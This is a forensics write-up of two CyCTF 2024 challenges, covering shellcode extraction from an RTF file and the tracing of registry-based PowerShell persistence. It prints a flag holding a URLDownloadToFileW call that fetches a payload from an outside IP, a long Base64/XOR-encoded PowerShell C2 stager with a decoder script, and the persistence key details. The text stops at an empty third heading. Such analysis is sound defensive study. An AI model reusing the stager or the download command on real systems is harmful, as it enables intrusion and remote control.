CyCTF 2024 Qualifications | Forensics Challenges Writeup

7 min readNov 3, 2024

For the third consecutive year, I had the opportunity to participate in CyCTF, powered by CyShield.

In this write-up, I will walk through the solutions to two challenges I tackled in the CTF: WarmUP and Persisted, and without any further due, let’s get into things.

1. WarmUp

Download the challenge from here and try to solve it.

Tools:

rtfdump.py
XORSearch
scDbg

Step 1: Identifying Hidden Data in the Attachment

The attachment provided was a .rtf file (Rich Text Format), which can sometimes contain hidden data. To analyze this file, we used a tool called rtfdump.py, which allows us to look inside .rtf files and find different parts (or "streams") where hidden information might be stored.

Command Used: rtfdump.py was run on the attachment to show us all the hidden sections inside it.
Outcome: We found several hidden parts of data in the file that could be suspicious.

Step 2: Extracting Data in a Readable Format

After identifying the hidden sections, we needed to look at them in a readable format. We used rtfdump.py again, with additional options to turn the data into a simple, readable form (hexadecimal format).

Command Used:

python rtfdump.py -s a -d -H C:\Users\$user\Desktop\Warm_UP.rtf > out.bin

This command told rtfdump.py to select all data parts (-s a), dump them (-d), and decode them to hexadecimal (-H). The data was saved into a file called out.bin.

Step 3: Searching for Malicious Code

The next step was to look for specific keywords that attackers often use in their code, like “PowerShell.” PowerShell is a tool often used in Windows computers for scripting; attackers sometimes use it to download malicious content. To search for this, we used a tool called XORSearch.

Command Used:

XORSearch.exe -W C:\Users\$user\Desktop\o.bin

This command scanned the file (o.bin) for any signs of PowerShell commands or similar keywords.
Outcome: The tool pointed us to a few places in the file where PowerShell commands seemed hidden.

Step 4: Decoding the Hidden Web Link

Now that we had locations of possible malicious code, we used a tool called scdbg. This tool helps to carefully decode any commands found at specific points in the data. By entering the first location offset (0000191E) that we found in the previous step, we could make scdbg reveal the hidden web link.

Outcome: scdbg revealed a single command, which included a web link used by the attacker to download their malicious content, and finally, we got our flag.

You need to replace your username with “IEUser.” as it was noted in the description of the challenge.

Flag: CyCTF{URLDownloadToFileW(http://107.172.130.147/460/newpicturesgetmetonicewith.tIF, C:\Users\IEUser\AppData\Roaming\newpicturesgetmetonicewit.vBS)}

Acknowledgment

Special shout out to my teammate CyberAssassin for his invaluable help and support throughout this challenge.

2. Persisted

Flag Format: CyCTF{HKCU\Software\Microsoft\Windows\Key:file.ext:127.0.0.1:1337}
Download the challenge from here and try to solve it.

Tools

Registry Explorer
CyberChef
VirusTotal

Step 1: Loading the Registry Files

First, I used Registry Explorer to open and examine various Windows registry hives. These hives are like databases containing settings and configurations for different parts of the Windows operating system and installed software.

The loaded hives were System, Security, Sam, Software, Default, Ntuser

Step 2: Searching for PowerShell Commands

Using the CTRL + F search function, we look for any signs of PowerShell commands.

I found 3 encoded PowerShell scripts located in different registry hives:

NTUSER.hiv
SYSTEM.hiv
DEFAULT.hiv

One of these entries was labeled with a suspicious key name, GameBarApi.

Step 3: Decoding the Encoded PowerShell Command

The PowerShell command was encoded, meaning it was transformed into a string of characters that isn’t human-readable. To understand what this command was doing, we needed to decode it.

The encoded script was a long Base64 string, which is a common way of encoding binary data as text. I used CyberChef, an online tool for data transformation, to decode this Base64 string into readable text.

Step 4: Decoding the XOR Encryption

The decoded script above was still encoded further using a technique called XOR encryption. XOR encryption is a way to transform data by combining it with a “key” (a number or string). In this case, each character in the script was XORed with the number 35.

To fully decode the script, use a Python script that removed the XOR encryption:

import base64

# Base64-encoded string
encoded_base64 = "32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJim3MjIyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDGhPRmIj9sJ6cjkdeKND2zWe022vtFwfEjW3X1HiRQyOqEi6WLbAVNa0YzDmrI+vX84XYH7R/iAqDrXADq/MXoxe08GKMDev+V83749A5iN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDe0FMWwouKSNyZtr1BbmZXBwfvTF4zyxVAXV65wIXDjDJgpb/ltLmzzNrBU31Shf/L0BzGNkSXKjh/yrUNEmaIzQ69tWW1FlbMtr8ebvaJaaoxJ/jdL5AyntkSdY1cy3O1cUwsVTNyOGnRc3xlDUs6Q1uM0lcrfuBMOwghpJ77GEBcHpjja7NEYQ7vjCZkltT1+WUKzbv5EyeRum39fKLw8AnhU4bqpna7zVQDU9prW9TN55nYsWPR46N8TvFhuUvCvM9jYKXhGFqnW3sqXG0HoQBgg31fXjokTvUVSzishpVzRkjYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIaEQ0SFRsNEhIVDRIRGiMZ/UuS"

# Decode the Base64 string
xor_encoded_data = base64.b64decode(encoded_base64)

# XOR each byte with 35 to decode
key = 35
decoded_chars = [chr(byte ^ key) for byte in xor_encoded_data]

# Join the decoded characters into a string
decoded_script = ''.join(decoded_chars)

print(decoded_script)

The Output: The script returned the User Agent and the IP, but no port, so it may be port 80 or 443 because it makes a connection to a webserver and there are the default ports.

Step 5: Analyzing Using VirusTotal

To further investigate, I uploaded the decoded PowerShell script file to VirusTotal.

Upon analysis, VirusTotal flagged the script as malicious and revealed additional details, including an IP address and port number used for Command and Control (C2) communication by the attacker.

You can find the link for analysis here.

Step 6: Examining the Key Name GameBarApi for Persistence Details

Using Registry Explorer, I searched for a suspicious key name, GameBarApi, which I had initially encountered in one of the encoded PowerShell scripts. This key contained the following PowerShell command:

This command indicates that PowerShell is retrieving and executing a Base64-encoded script stored in the registry key HKCU:\Software\Microsoft\GameBarApi. The command’s Last Write Time was 2024-10-24 21:13:45, suggesting this was a key event in the persistence setup.

Step 7: Identifying the Initial Access Time

To trace the initial access method, I focused on files accessed around the time the registry key was last modified. In Registry Explorer, I checked the RecentDocs entry and filtered entries for documents accessed between 2024-10-24 21:13:45 and 2024-10-24 21:18:45 (5 minutes after the registry key modification).

Step 8: Inspecting Recent Documents for Initial Access Files

To identify the file used for initial access, I checked the RecentDocs section of the registry, which logs recently opened documents. In this case, I discovered two suspicious files with names:1223.phantom and cyshell2.ps1.txt

After analyzing their timestamps and potential relevance, I determined that 1223.phantom was likely the initial access file, as it appeared before the persistence setup was completed.

Step 9: Locating the Initial Registry Key Responsible for Persistence

Further examination revealed that after executing 1223.phantom, the attacker created a registry key to maintain persistence. The initial registry key responsible for persistence was:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList

This key instructs Windows to associate files with the .phantom extension with a particular application, enabling the attacker’s payload to execute whenever a .phantom file is opened with an execute PowerShell.exe.

Flag: CyCTF{HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList:1223.phantom:192.168.116.129:80}

3. Injection